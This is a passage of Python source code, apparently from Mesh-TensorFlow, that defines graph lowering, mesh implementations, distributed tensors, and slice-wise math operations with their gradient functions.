self.tensor_axis_to_mesh_axis == (None,) * len(self)\n\n def mesh_axis_to_tensor_axis(self, mesh_ndims):\n \"\"\"For each mesh axis, which Tensor axis maps to it.\n\n Args:\n mesh_ndims: int.\n\n Returns:\n Tuple of optional integers, with length mesh_ndims.\n \"\"\"\n return tuple(\n [self._tensor_axis_to_mesh_axis.index(mesh_axis)\n if mesh_axis in self._tensor_axis_to_mesh_axis else None\n for mesh_axis in xrange(mesh_ndims)])\n\n\nclass Graph(object):\n \"\"\"Mesh-TensorFlow graph.\"\"\"\n\n def __init__(self):\n self._operations = []\n self._tensors = []\n self._trainable_variables = []\n self._all_variables = []\n\n def __repr__(self):\n return self.to_string\n\n @property\n def operations(self):\n return self._operations\n\n @property\n def tensors(self):\n return self._tensors\n\n @property\n def trainable_variables(self):\n return self._trainable_variables\n\n @property\n def all_variables(self):\n return self._all_variables\n\n @property\n def to_string(self):\n return \"\\n\".join([op.to_string for op in self.operations])\n\n\nclass Lowering(object):\n \"\"\"Lowering of a Graph from Mesh-TensorFlow to TensorFlow.\n\n #### Examples\n\n Below we form a Graph with one Tensor and lower it to recover the original\n tf.Tensor.\n\n ```python\n from tensor2tensor.mesh_tensorflow import placement_mesh_impl\n\n graph = mtf.Graph()\n mesh = mtf.Mesh(graph, \"my_mesh\")\n inputs = tf.constant(0.)\n mtf_inputs = mtf.import_tf_tensor(mesh,\n inputs=inputs,\n shape=mtf.Shape([]))\n mesh_impl = placement_mesh_impl.PlacementMeshImpl(\n shape=[], layout={}, devices=[\"\"])\n lowering = mtf.Lowering(graph, {mesh: mesh_impl})\n outputs = lowering.export_to_tf_tensor(mtf_inputs) # tf.constant(0.)\n ```\n \"\"\"\n\n def __init__(self, graph, mesh_to_impl):\n \"\"\"Creates a Lowering of a Graph.\n\n Args:\n graph: Graph.\n mesh_to_impl: {Mesh: MeshImpl}. 
Keys are the Mesh's in the graph and\n their values are MeshImpl's, which map Tensor Dimension names to\n Mesh Dimension names.\n \"\"\"\n # tf.logging.info(\"LOWERING GRAPH:\\n%s\" % graph.to_string)\n self.mesh_to_impl = mesh_to_impl # {Mesh: MeshImpl}\n self.graph = graph\n self._counters = []\n self.tensors = {} # {Tensor: Mesh.LaidOutTensor}\n self.operations = {} # {Operation: tf.Operation}\n self.variables = {} # {Variable: LaidOutVariable}\n for op in graph.operations:\n # tf.logging.info(\"Lowering operation %s\" % op.to_string)\n with tf.name_scope(op.name):\n op.lower(self)\n for out in op.outputs:\n self.add_counter(\n \"output/%s\" % type(op).__name__, self.laid_out_size(out))\n self.add_counter(\"output_unique/%s\" % type(op).__name__, out.size)\n log_variable_sizes(\n graph.trainable_variables, \"Trainable Variables\", verbose=True)\n tf.logging.info(\"Counters:\\n\" + pretty_print_counters(self._counters))\n\n def mesh_impl(self, m):\n if not isinstance(m, Mesh):\n m = m.mesh\n return self.mesh_to_impl[m]\n\n def export_to_tf_tensor(self, x):\n \"\"\"Turn a Tensor into a tf.Tensor.\n\n Args:\n x: Tensor.\n\n Returns:\n tf.Tensor.\n \"\"\"\n mesh_impl = self.mesh_impl(x)\n return mesh_impl.export_to_tf_tensor(\n x, self.tensors[x].to_laid_out_tensor())\n\n def lowered_operation(self, op):\n return self.operations[op]\n\n def copy_masters_to_slices(self):\n return tf.group(\n [v.copy_master_to_slices for v in six.itervalues(self.variables)])\n\n def copy_slices_to_masters(self):\n return tf.group(\n [v.copy_slices_to_master for v in six.itervalues(self.variables)])\n\n def add_counter(self, key, value):\n assert isinstance(value, int)\n self._counters.append((key, value))\n\n @property\n def counters(self):\n return self._counters\n\n def laid_out_size(self, tensor):\n \"\"\"Total size of all slices.\n\n Args:\n tensor: Tensor.\n\n Returns:\n int.\n \"\"\"\n return self.mesh_impl(tensor).laid_out_size(tensor.shape)\n\n def set_tensor_lowering(self, tensor, laid_out_tensor):\n self.verify_slice_shapes(tensor, laid_out_tensor)\n self.tensors[tensor] = laid_out_tensor\n\n def verify_slice_shapes(self, tensor, laid_out_tensor):\n mesh_impl = self.mesh_impl(tensor)\n correct_shape = mesh_impl.slice_shape(tensor.shape)\n actual_shape = laid_out_tensor.slice_shape\n if actual_shape != correct_shape:\n raise ValueError(\n \"Wrong slice shape: correct_shape = %s actual shape = %s\"\n % (correct_shape, actual_shape))\n\n\nclass Mesh(object):\n \"\"\"A placeholder with no functionality.\n\n A Graph is built with each Tensor assigned to a Mesh. The Mesh does not\n know its shape or its implementation.\n\n A Lowering assigns each Mesh to a MeshImpl.\n \"\"\"\n\n def __init__(self, graph, name):\n self._graph = graph\n self._name = name\n\n @property\n def graph(self):\n return self._graph\n\n\nclass MeshImpl(object):\n \"\"\"Implementation of a Mesh.\n\n Unlike Mesh, MeshImpl carries Shape and LayoutRules. 
Subclasses of MeshImpl\n also carry devices.\n\n #### Examples\n\n ```python\n shape = mtf.Shape([mtf.Dimension(\"batch\", 4),\n mtf.Dimension(\"model\", 8)])\n layout_rules = mtf.LayoutRules([(\"batch\", \"batch\"),\n (\"d_ff\", \"model\"),\n (\"heads\", \"model\")])\n mesh_impl = mtf.MeshImpl(shape=shape, layout_rules=layout_rules)\n ```\n \"\"\"\n\n def __init__(self, shape, layout_rules):\n \"\"\"Creates a mesh implementation.\n\n Args:\n shape: Shape.\n layout_rules: LayoutRules.\n \"\"\"\n self._shape = convert_to_shape(shape)\n self._layout_rules = convert_to_layout_rules(layout_rules)\n\n @property\n def shape(self):\n return self._shape\n\n @property\n def ndims(self):\n return len(self._shape)\n\n @property\n def layout_rules(self):\n return self._layout_rules\n\n @property\n def size(self):\n return self.shape.size\n\n @property\n def supports_control_dependencies(self):\n return True\n\n def tensor_dimension_to_mesh_axis(self, tensor_dimension):\n \"\"\"Mesh axis associated with tensor dimension (or None).\n\n Args:\n tensor_dimension: Dimension.\n\n Returns:\n int or None.\n \"\"\"\n return self.layout_rules.tensor_dimension_to_mesh_axis(\n tensor_dimension, self.shape)\n\n def tensor_layout(self, arg):\n \"\"\"Compute TensorLayout for a Tensor or a Shape.\n\n Args:\n arg: Tensor or Shape.\n\n Returns:\n TensorLayout.\n \"\"\"\n if isinstance(arg, Tensor):\n arg = arg.shape\n return self.layout_rules.tensor_layout(arg, self.shape)\n\n def mesh_axis_to_cumprod(self, tensor_shape):\n \"\"\"For each mesh axis, give the product of previous tensor axes.\n\n Args:\n tensor_shape: Shape.\n\n Returns:\n list with length self.ndims where each element is an integer or None.\n \"\"\"\n tensor_layout = self.tensor_layout(tensor_shape)\n ma2ta = tensor_layout.mesh_axis_to_tensor_axis(self.ndims)\n ta2cumprod = tensor_shape.cumprod\n return [None if ta is None else ta2cumprod[ta] for ta in ma2ta]\n\n def slice_shape(self, tensor_shape):\n \"\"\"Shape of each slice of the Tensor.\n\n Args:\n tensor_shape: Shape.\n\n Returns:\n list of integers with length tensor_shape.ndims.\n\n Raises:\n ValueError: If a Tensor dimension is not divisible by the corresponding\n Mesh dimension.\n \"\"\"\n tensor_layout = self.tensor_layout(tensor_shape)\n ret = []\n for tensor_dim, mesh_axis in zip(\n tensor_shape, tensor_layout.tensor_axis_to_mesh_axis):\n if mesh_axis is None:\n ret.append(tensor_dim.size)\n else:\n mesh_dim = self.shape[mesh_axis]\n if tensor_dim.size % mesh_dim.size != 0:\n raise ValueError(\n \"Tensor dimension size not divisible by mesh dimension size:\"\n \" tensor_shape=%s tensor_layout=%s\"\n % (tensor_shape, tensor_layout))\n ret.append(tensor_dim.size // mesh_dim.size)\n return ret\n\n def slice_begin(self, tensor_shape, pnum):\n \"\"\"Begin position for the tensor slice for the given processor.\n\n Args:\n tensor_shape: Shape.\n pnum: int <= self.size.\n\n Returns:\n list of integers with length tensor_shape.ndims.\n \"\"\"\n tensor_layout = self.tensor_layout(tensor_shape)\n coordinates = pnum_to_processor_coordinates(self.shape, pnum)\n ret = []\n for dim_size, mesh_axis in zip(\n tensor_shape.to_integer_list, tensor_layout.tensor_axis_to_mesh_axis):\n if mesh_axis is None:\n ret.append(0)\n else:\n ret.append(\n dim_size // self.shape[mesh_axis].size * coordinates[mesh_axis])\n return ret\n\n def laid_out_size(self, tensor_shape):\n \"\"\"Total size of all slices.\n\n Args:\n tensor_shape: Shape.\n\n Returns:\n int.\n \"\"\"\n return list_product(self.slice_shape(tensor_shape)) 
* self.size\n\n def slicewise(self, fn, *inputs):\n \"\"\"Executes a function in parallel on all slices.\n\n Args:\n fn: function from tf.Tensors to tf.Tensor or a tuple of tf.Tensors.\n *inputs: list of inputs. Each input is either a LaidOutTensor or\n is convertible to a tf.Tensor.\n\n Returns:\n LaidOutTensor, or a tuple of LaidOutTensors if fn returns a tuple.\n \"\"\"\n raise NotImplementedError(\"Slicewise not implemented\")\n\n def Print(self, x, data, message, **kwargs): # pylint: disable=invalid-name\n \"\"\"Calls tf.Print.\n\n Args:\n x: LaidOutTensor.\n data: list of LaidOutTensor.\n message: str.\n **kwargs: keyword arguments to tf.print.\n\n Returns:\n LaidOutTensor.\n \"\"\"\n del data, message, kwargs\n tf.logging.warning(\"Warning - mtf.Print not implemented for this mesh type\")\n return x\n\n def allreduce(self, x, mesh_axes, reduction_fn_string):\n \"\"\"Grouped allreduce, (summed across the given dimensions).\n\n Args:\n x: LaidOutTensor.\n mesh_axes: list of integers, the mesh dimensions to be reduced.\n reduction_fn_string: \"SUM\" or \"MAX\".\n\n Returns:\n LaidOutTensor.\n \"\"\"\n raise NotImplementedError(\"Allreduce not implemented\")\n\n def allsplit(self, x, mesh_axis, split_axis, which=None):\n \"\"\"Inverse of allconcat - split each slice and keep only one piece of it.\n\n The number of ways to split is the number of processors in the group.\n The part that is kept corresponds to the processor's index in the group.\n\n Args:\n x: LaidOutTensor.\n mesh_axis: int, the mesh axis along which to split.\n split_axis: int, the Tensor axis along which to split.\n which: an optional LaidOutTensor of integer scalars. Selects the slice to\n to keep, instead of the coordinate.\n\n Returns:\n LaidOutTensor.\n \"\"\"\n if which is None:\n which = self.laid_out_pcoord(mesh_axis)\n num_splits = self.shape[mesh_axis].size\n def my_fn(x, which):\n slice_begin = [\n dimsize // num_splits * which if i == split_axis\n else 0 for i, dimsize in enumerate(x.shape.as_list())]\n slice_size = [\n dimsize // num_splits if i == split_axis\n else dimsize for i, dimsize in enumerate(x.shape.as_list())]\n return tf.slice(x, slice_begin, slice_size)\n return self.slicewise(my_fn, x, which)\n\n def allconcat(self, x, mesh_axis, concat_axis):\n \"\"\"Grouped allconcat (like MPI allgather followed by concat).\n\n Args:\n x: LaidOutTensor.\n mesh_axis: int, the mesh axis along which to group.\n concat_axis: int, the Tensor axis along which to concatenate.\n\n Returns:\n LaidOutTensor.\n \"\"\"\n raise NotImplementedError(\"Allconcat not implemented\")\n\n def alltoall(self, x, mesh_axis, split_axis, concat_axis):\n \"\"\"Grouped alltoall (like MPI alltoall with splitting and concatenation).\n\n Args:\n x: LaidOutTensor.\n mesh_axis: int, the mesh axis along which to group.\n split_axis: int, the Tensor axis along which to split.\n concat_axis: int, the Tensor axis along which to concatenate.\n\n Returns:\n LaidOutTensor.\n \"\"\"\n raise NotImplementedError(\"Alltoall not implemented\")\n\n def receive(self, x, mesh_axis, source_pcoord):\n \"\"\"Collective receive in groups.\n\n Each group contains the processors that differ only in mesh_axis.\n\n ```python\n group_size = self.shape[mesh_axis].size\n ```\n\n Args:\n x: a LaidOutTensor\n mesh_axis: an integer\n source_pcoord: a list of optional integers. Each element is either None\n or an integer in [0, group_size). If source_pcoord[k] is None, then the\n output for the k-th processor in each group is a zero tensor. 
If\n source_pcoord[k] is not None, then the output for the k-th processor in\n each group is equal to the input for the source_pcoord[k]-th processor\n in that group.\n\n Returns:\n a LaidOutTensor\n \"\"\"\n raise NotImplementedError(\"Alltoall not implemented\")\n\n def shift_by_n_processors(self, x, mesh_axis, offset, wrap):\n \"\"\"Receive the slice from processor pcoord - offset.\n\n Args:\n x: a LaidOutTensor\n mesh_axis: an integer\n offset: an integer\n wrap: a boolean. If True, then wrap around. Otherwise, pad with zeros.\n \"\"\"\n n = self.shape[mesh_axis].size\n source_pcoord = []\n for i in xrange(n):\n c = i - offset\n if c != c % n:\n if wrap:\n c = c % n\n else:\n c = None\n source_pcoord.append(c)\n return self.receive(x, mesh_axis, source_pcoord)\n\n def laid_out_pnum(self):\n \"\"\"Returns a LaidOutTensor containing the processor number.\n\n Returns:\n LaidOutTensor where each slice is an integer scalar.\n \"\"\"\n raise NotImplementedError(\"laid_out_pnum not implemented\")\n\n def laid_out_pcoord(self, mesh_axis):\n \"\"\"Returns a LaidOutTensor containing the processor coordinate.\n\n Args:\n mesh_axis: int.\n\n Returns:\n LaidOutTensor where each slice is an integer scalar.\n \"\"\"\n divisor = list_product(self.shape.to_integer_list[mesh_axis + 1:])\n modulus = self.shape[mesh_axis].size\n def my_fn(pnum):\n return (pnum // divisor) % modulus\n return self.slicewise(my_fn, self.laid_out_pnum())\n\n def broadcast_impl(self, old_slices, old_shape, new_shape):\n \"\"\"Implementation of a broadcast operation.\n\n Args:\n old_slices: LaidOutTensor.\n old_shape: Shape.\n new_shape: Shape.\n\n Returns:\n LaidOutTensor.\n \"\"\"\n new_slice_shape = self.slice_shape(new_shape)\n def tf_fn(x):\n return (tf.zeros(new_slice_shape, dtype=x.dtype) +\n _expand_dims(x, old_shape, new_shape))\n return self.slicewise(tf_fn, old_slices)\n\n def make_slices(self, tf_tensor, tensor_shape):\n \"\"\"Turns a single tf.Tensor into a list of slices, one for each processor.\n\n Args:\n tf_tensor: tf.Tensor.\n tensor_shape: Shape.\n\n Returns:\n list of tf.tensor with length self.size.\n \"\"\"\n tensor_layout = self.tensor_layout(tensor_shape)\n slice_shape = self.slice_shape(tensor_shape)\n def my_fn(pnum):\n if tensor_layout.is_fully_replicated:\n return tf_tensor\n else:\n slice_begin = self.slice_begin(tensor_shape, pnum)\n return tf.slice(tf_tensor, slice_begin, slice_shape)\n\n return parallel([tf_tensor.device] * self.size, my_fn,\n list(xrange(self.size)))\n\n def combine_slices(self, slices, tensor_shape, device=None):\n \"\"\"Turns a set of slices into a single tensor.\n\n Args:\n slices: list of tf.Tensor with length self.size.\n tensor_shape: Shape.\n device: optional str. 
If absent, we use the devices of the slices.\n\n Returns:\n tf.Tensor.\n \"\"\"\n if tensor_shape.ndims == 0:\n return slices[0]\n\n ret = slices[:]\n tensor_layout = self.tensor_layout(tensor_shape)\n for mesh_dim, tensor_axis in zip(\n self.shape, tensor_layout.mesh_axis_to_tensor_axis(self.ndims)):\n slice_size = len(ret) // mesh_dim.size\n if tensor_axis is None:\n ret = ret[:slice_size]\n else:\n if device:\n devices = [device] * slice_size\n else:\n devices = [ret[i].device for i in xrange(slice_size)]\n concat_inputs = [[ret[i + slice_size * j]\n for j in xrange(mesh_dim.size)]\n for i in xrange(slice_size)]\n ret = parallel(\n devices, tf.concat, concat_inputs,\n axis=[tensor_axis] * len(devices))\n assert len(ret) == 1\n return ret[0]\n\n def export_to_tf_tensor(self, x, laid_out_x):\n \"\"\"Turns a Tensor into a tf.Tensor.\n\n Args:\n x: Tensor.\n laid_out_x: LaidOutTensor.\n\n Returns:\n tf.Tensor.\n \"\"\"\n raise NotImplementedError(\"export_to_tf_tensor not implemented\")\n\n def import_tf_tensor(self, x, tf_x):\n \"\"\"Imports a tf.Tensor, producing a LaidOutTensor.\n\n Args:\n x: Tensor.\n tf_x: tf.Tensor.\n\n Returns:\n LaidOutTensor.\n \"\"\"\n raise NotImplementedError(\"Import not implemented\")\n\n\nclass LazyAllreduceSum(object):\n \"\"\"Represents a LaidOutTensor with a lazy allreduce.\n\n The purpose of delaying allreduce is that it saves bandwidth to first add\n and then allreduce, as opposed to the other way around.\n \"\"\"\n\n def __init__(self,\n mesh_impl,\n laid_out_input,\n mesh_axes,\n add_counter_fn=None):\n \"\"\"Create a LazyAllreduceSum.\n\n Args:\n mesh_impl: a mesh_impl\n laid_out_input: a LaidOutTensor\n mesh_axes: a list of mesh axes\n add_counter_fn: a function taking no arguments which calls\n lowering.add_counter if and when the allreduce executes.\n Returns:\n a LazyAllreduceSum\n \"\"\"\n self.mesh_impl = mesh_impl\n self.laid_out_input = laid_out_input\n self.mesh_axes = mesh_axes\n self._add_counter_fn = add_counter_fn\n self._reduced = None\n\n def to_laid_out_tensor(self):\n if not self._reduced:\n self._reduced = self.mesh_impl.allreduce(\n self.laid_out_input, self.mesh_axes, \"SUM\")\n if self._add_counter_fn:\n self._add_counter_fn()\n return self._reduced\n\n def __add__(self, other):\n \"\"\"Add to another LazyAllreduceSum.\n\n Args:\n other: a LazyAllreduceSum or a LaidOutTensor\n Returns:\n a LazyAllreduceSum or a LaidOutTensor\n \"\"\"\n if (isinstance(other, LazyAllreduceSum) and\n self.mesh_impl == other.mesh_impl and\n self.mesh_axes == other.mesh_axes):\n return LazyAllreduceSum(\n self.mesh_impl,\n self.mesh_impl.slicewise(\n tf.add, self.laid_out_input, other.laid_out_input),\n self.mesh_axes,\n add_counter_fn=self._add_counter_fn)\n else:\n return self.mesh_impl.slicewise(\n tf.add, self.to_laid_out_tensor(), other.to_laid_out_tensor())\n\n @property\n def slice_shape(self):\n return self.laid_out_input.slice_shape\n\n\ndef convert_args_to_laid_out_tensors(xs):\n \"\"\"Convert list elements to laid-out-tensors when possible.\n\n Args:\n xs: a list\n Returns:\n a list\n \"\"\"\n ret = []\n for x in xs:\n try:\n ret.append(x.to_laid_out_tensor())\n except AttributeError:\n ret.append(x)\n return ret\n\n\nclass Tensor(object):\n \"\"\"A Distributed Tensor.\"\"\"\n\n def __init__(self, operation, shape, dtype, name=None):\n if not isinstance(shape, Shape):\n raise ValueError(\"shape must be a Shape got %s\" % shape.to_string)\n if not isinstance(dtype, tf.DType):\n raise ValueError(\"dtype must be a tf.DType got %s\" % dtype)\n 
self._mesh = operation.mesh\n self._operation = operation\n self._shape = shape\n self._dtype = dtype\n if name is None:\n name = self.operation.name\n self._name = name\n self._mesh.graph.tensors.append(self)\n\n @property\n def shape(self):\n return self._shape\n\n @property\n def size(self):\n return self.shape.size\n\n @property\n def mesh(self):\n return self._mesh\n\n @property\n def graph(self):\n return self._mesh.graph\n\n @property\n def operation(self):\n return self._operation\n\n @property\n def dtype(self):\n return self._dtype\n\n @property\n def name(self):\n return self._name\n\n def __repr__(self):\n return self.to_string\n\n def __add__(self, other):\n return add(self, other)\n\n def __radd__(self, other):\n return add(self, other)\n\n def __sub__(self, other):\n return sub(self, other)\n\n def __rsub__(self, other):\n return sub(other, self)\n\n def __mul__(self, other):\n return multiply(self, other)\n\n def __rmul__(self, other):\n return multiply(self, other)\n\n def __neg__(self):\n return negative(self)\n\n def __truediv__(self, other):\n return divide(self, other)\n\n def __rtruediv__(self, other):\n return divide(other, self)\n\n def __floordiv__(self, other):\n return floordiv(self, other)\n\n def __rfloordiv__(self, other):\n return floordiv(other, self)\n\n def __mod__(self, other):\n return mod(self, other)\n\n def __rmod__(self, other):\n return mod(other, self)\n\n @property\n def to_string(self):\n return \"Tensor[%s, %s, %s]\" % (self.name, self.shape.to_string, self.dtype)\n\n\nclass Operation(object):\n \"\"\"A Distributed Operation.\"\"\"\n\n def __init__(self, inputs, mesh=None, name=None):\n if mesh is None:\n if not inputs:\n raise ValueError(\"mesh must be specified if no inputs\")\n mesh = inputs[0].mesh\n self._inputs = inputs\n self._outputs = []\n self._mesh = mesh\n assert name is not None\n scope_name = tf.get_variable_scope().name\n if scope_name:\n name = scope_name + \"/\" + name\n self._name = name\n mesh.graph.operations.append(self)\n\n @property\n def graph(self):\n return self._mesh.graph\n\n @property\n def mesh(self):\n return self._mesh\n\n @property\n def name(self):\n return self._name\n\n @property\n def inputs(self):\n return self._inputs[:]\n\n @property\n def outputs(self):\n return self._outputs[:]\n\n @property\n def to_string(self):\n return \"%s[Inputs=(%s) Outputs=(%s)]\" % (\n type(self).__name__,\n \", \".join([t.to_string for t in self.inputs]),\n \", \".join([t.to_string for t in self.outputs]))\n\n @property\n def has_gradient(self):\n return (\n [t for t in self.inputs if t.dtype.is_floating] and\n [t for t in self.outputs if t.dtype.is_floating])\n\n def gradient(self, unused_grad_ys):\n raise NotImplementedError(\"Gradient not implemented\")\n\n def lower(self, lowering):\n raise NotImplementedError(\"Lower not implemented\")\n\n\nclass SlicewiseOperation(Operation):\n \"\"\"Apply any tensorflow function slice-wise.\n\n Calls the Tensorflow function on each slice of the inputs to produce the\n corresponding slice of the outputs. Gradients are computed through\n tensorflow.\n\n The user must specify \"splittable_dims\": a list of Dimensions which can\n be split while still keeping this computation valid. 
For example, for\n component-wise functions, all the dimensions are splittable, but if the\n function is a reduction, the reduced dimensions are not splittable.\n \"\"\"\n\n def __init__(self,\n tf_fn,\n inputs,\n output_shape,\n output_dtype,\n splittable_dims,\n grad_function=None,\n name=None):\n \"\"\"Create a SlicewiseOperation.\n\n grad_function is a python function taking this operation and a gradients\n Tensor and producing input gradients tensors.\n e.g.\n def _square_grad(op, dy):\n return [dy * op.inputs[0] * 2]\n\n Args:\n tf_fn: a function taking n tf.Tensors and returning a tf.Tensor\n inputs: a list of n Tensors\n output_shape: a Shape\n output_dtype: a dtype\n splittable_dims: a list of Dimensions which are ok to split\n grad_function: an optional python function. Default to using tf.gradients\n name: an optional string\n \"\"\"\n super(SlicewiseOperation, self).__init__(inputs, name=name or \"slicewise\")\n self._tf_fn = tf_fn\n self._outputs = [Tensor(self, output_shape, output_dtype)]\n self._splittable_dims = splittable_dims\n self._grad_function = grad_function\n\n def gradient(self, grad_ys):\n if self._grad_function is not None:\n return self._grad_function(self, grad_ys[0])\n return GenericGradOperation(self, grad_ys).outputs\n\n def lower(self, lowering):\n # Check that only splittable dims are split\n mesh_impl = lowering.mesh_impl(self)\n for t in self.inputs + self.outputs:\n layout = mesh_impl.tensor_layout(t)\n for d, mesh_axis in zip(t.shape.dims, layout.tensor_axis_to_mesh_axis):\n if mesh_axis is not None and d not in self._splittable_dims:\n raise ValueError(\"dimension %s is not declared as splittable\" % d)\n lowering.set_tensor_lowering(\n self.outputs[0],\n mesh_impl.slicewise(\n self._tf_fn, *[lowering.tensors[x] for x in self.inputs]))\n\n\ndef slicewise(tf_fn,\n xs,\n output_shape=None,\n output_dtype=None,\n splittable_dims=None,\n grad_function=None,\n name=None):\n \"\"\"Slice-wise call to any tensorflow function.\n\n The output shape and dtype default to those of the first input.\n splittable_dims is a list of Dimensions which can be split while keeping the\n computation valid.\n\n Args:\n tf_fn: a function taking n tf.Tensors and returning a tf.Tensor\n xs: a list of n Tensors\n output_shape: a Shape\n output_dtype: a dtype\n splittable_dims: a list of Dimensions which are ok to split\n grad_function: an optional gradients function. 
If None, use tf gradient.\n name: an optional string\n\n Returns:\n a Tensor\n \"\"\"\n return SlicewiseOperation(\n tf_fn,\n xs,\n convert_to_shape(output_shape) or xs[0].shape,\n output_dtype or xs[0].dtype,\n splittable_dims,\n grad_function,\n name=name).outputs[0]\n\n\ndef cwise(tf_fn, xs, output_dtype=None, grad_function=None, name=None):\n \"\"\"Component-wise operation with no broadcasting.\n\n Args:\n tf_fn: a component-wise function taking n tf.Tensor inputs and producing\n a tf.Tensor output\n xs: n Tensors\n output_dtype: an optional dtype\n grad_function: an optional python function\n name: an optional string\n\n Returns:\n a Tensor\n \"\"\"\n return slicewise(\n tf_fn, xs, output_dtype=output_dtype, splittable_dims=xs[0].shape.dims,\n grad_function=grad_function, name=name or \"cwise\")\n\n\ndef square(x, name=\"square\"):\n return cwise(\n tf.square, [x], name=name,\n grad_function=lambda op, dy: [dy * op.inputs[0] * 2])\n\n\ndef sqrt(x, name=\"sqrt\"):\n return cwise(\n tf.sqrt, [x], name=name,\n grad_function=lambda op, dy: [dy * 0.5 / op.outputs[0]])\n\n\ndef _rsqrt_grad(op, dy):\n return [dy * -0.5 * op.outputs[0] * op.outputs[0] * op.outputs[0]]\n\n\ndef rsqrt(x, name=\"rsqrt\"):\n return cwise(\n tf.rsqrt, [x], name=name, grad_function=_rsqrt_grad)\n\n\ndef log(x, name=\"log\"):\n return cwise(\n tf.log, [x], name=name,\n grad_function=lambda op, dy: [dy / op.inputs[0]])\n\n\ndef exp(x, name=\"exp\"):\n return cwise(tf.exp, [x], name=name,\n grad_function=lambda op, dy: [dy * op.outputs[0]])\n\n\ndef sigmoid(x, name=\"sigmoid\"):\n def grad_function(op, dy):\n y = op.outputs[0]\n return [y * (1.0 - y) * dy]\n return cwise(tf.sigmoid, [x], name=name, grad_function=grad_function)\n\n\ndef tanh(x, name=\"tanh\"):\n def grad_function(op, dy):\n y = op.outputs[0]\n return [(1.0 - square(y)) * dy]\n return cwise(tf.tanh, [x], name=name, grad_function=grad_function)\n\n\ndef pow(x, y): # pylint: disable=redefined-builtin\n return exp(log(x) * y)\n\n\ndef negative(x, name=\"negative\"):\n return cwise(tf.negative, [x], name=name,\n grad_function=lambda op, dy: [negative(dy)])\n\n\ndef logical_not(x, name=\"logical_not\"):\n return cwise(tf.logical_not, [x], name=name)\n\n\ndef reciprocal(x, name=\"reciprocal\"):\n return cwise(\n tf.reciprocal, [x], name=name,\n grad_function=lambda op, dy: [negative(dy * square(op.outputs[0]))])\n\n\ndef _relu_grad(op, dy):\n return [dy * cast(greater(op.inputs[0], 0), op.inputs[0].dtype)]\n\n\ndef relu(x, name=\"relu\"):\n return cwise(tf.nn.relu, [x], name=name, grad_function=_relu_grad)\n\n\ndef cast(x, dtype, name=\"cast\"):\n if dtype == x.dtype:\n return x\n return cwise(\n lambda x: tf.cast(x, dtype), [x], output_dtype=dtype, name=name,\n grad_function=lambda op, dy: [cast(dy, op.inputs[0].dtype)])\n\n\ndef to_float(x, name=\"to_float\"):\n return cast(x, tf.float32, name=name)\n\n\ndef to_int32(x, name=\"to_int32\"):\n return cast(x, tf.int32, name=name)\n\n\nclass GenericGradOperation(Operation):\n \"\"\"Gradients that follow regular TF.\n\n Calling tf.gradients multiple times seems really slow in python.\n TODO(noam): can we speed this up using functions or some other method?\n \"\"\"\n\n def __init__(self, forward_op, grad_ys, name=None):\n # tf.logging.info(\"forward inp %s, operations %s, grad_ys: %s\",\n # forward_op.inputs, forward_op.outputs, grad_ys)\n super(GenericGradOperation, self).__init__(\n forward_op.inputs + forward_op.outputs + grad_ys,\n name=name or \"generic_grad\")\n self._grad_ys = grad_ys\n self._forward_op = 
forward_op\n self._outputs = [Tensor(self, x.shape, x.dtype) for x in forward_op.inputs]\n\n def lower(self, lowering):\n # lists of lists of tf.Tensor\n all_ys = transpose_list_of_lists(\n [lowering.tensors[y].tensor_list for y in self._forward_op.outputs])\n all_xs = transpose_list_of_lists(\n [lowering.tensors[x].tensor_list for x in self._forward_op.inputs])\n all_grad_ys = transpose_list_of_lists(\n [lowering.tensors[dy].tensor_list for dy in self._grad_ys])\n all_grad_xs = [tf.gradients(ys=ys, xs=xs, grad_ys=grad_ys) for\n ys, xs, grad_ys in zip(all_ys, all_xs, all_grad_ys)]\n grad_xs = transpose_list_of_lists(all_grad_xs)\n for out, grad_x in zip(self.outputs, grad_xs):\n lowering.set_tensor_lowering(\n out,\n lowering.mesh_impl(self).LaidOutTensor.from_tensor_list(grad_x))\n\n\nclass ScalarMultiplyOperation(Operation):\n \"\"\"Multiply by a tf Scalar (no backprop to scalar).\"\"\"\n\n def __init__(self, x, scalar, name=None):\n super(ScalarMultiplyOperation, self).__init__(\n [x], name=name or \"scalar_mul\")\n self._outputs = [Tensor(self, x.shape, x.dtype)]\n self._scalar = scalar\n\n def gradient(self, grad_ys):\n dy = grad_ys[0]\n return [dy * self._scalar]\n\n def lower(self, lowering):\n lowering.set_tensor_lowering(\n self.outputs[0],\n lowering.mesh_impl(self).slicewise(\n lambda x: x * self._scalar, lowering.tensors[self.inputs[0]]))\n\n\nclass ScalarAddOperation(Operation):\n \"\"\"Add a tf Scalar (no backprop to scalar).\"\"\"\n\n def __init__(self, x, scalar, name=None):\n super(ScalarAddOperation, self).__init__([x], name=name or \"scalar_add\")\n self._outputs = [Tensor(self, x.shape, x.dtype)]\n self._scalar = scalar\n\n def gradient(self, grad_ys):\n return grad_ys\n\n def lower(self, lowering):\n lowering.set_tensor_lowering(\n self.outputs[0],\n lowering.mesh_impl(self).slicewise(\n lambda x: x + self._scalar, lowering.tensors[self.inputs[0]]))\n\n\nclass BinaryOpWithBroadcasting(Operation):\n \"\"\"Binary operation with broadcasting.\"\"\"\n\n def __init__(self, tf_fn, x1, x2, output_shape, output_dtype, name=None):\n super(BinaryOpWithBroadcasting, self).__init__(\n [x1, x2], name=name or \"binary_op\")\n assert isinstance(output_dtype, tf.DType)\n self._outputs = [Tensor(self, output_shape, output_dtype)]\n self._tf_fn = tf_fn\n\n def gradient(self, unused_grad_ys):\n raise ValueError(\"Gradient not implememnted\")\n\n def lower(self, lowering):\n x1 = self.inputs[0]\n x2 = self.inputs[1]\n output = self.outputs[0]\n laid_out_x1 = lowering.tensors[x1]\n laid_out_x2 = lowering.tensors[x2]\n mesh_impl = lowering.mesh_impl(self)\n if x1.shape != output.shape:\n laid_out_x1 = mesh_impl.slicewise(\n _expand_dims, laid_out_x1, x1.shape, output.shape)\n if x2.shape != output.shape:\n laid_out_x2 = mesh_impl.slicewise(\n _expand_dims, laid_out_x2, x2.shape, output.shape)\n lowering.set_tensor_lowering(\n self.outputs[0],\n mesh_impl.slicewise(\n self._tf_fn, laid_out_x1, laid_out_x2))\n\n\ndef binary_arguments_to_tensors(x1, x2):\n \"\"\"Convert argument of a binary operation to Tensors.\n\n Args:\n x1: a Tensor or something convertible to a tf Scalar\n x2: a Tensor or something convertible to a tf Scalar\n\n Returns:\n new_x1: a Tensor\n new_x2: a Tensor\n\n Raises:\n ValueError: on failure\n \"\"\"\n if not isinstance(x1, Tensor) and not isinstance(x2, Tensor):\n raise ValueError(\"at least one of x1 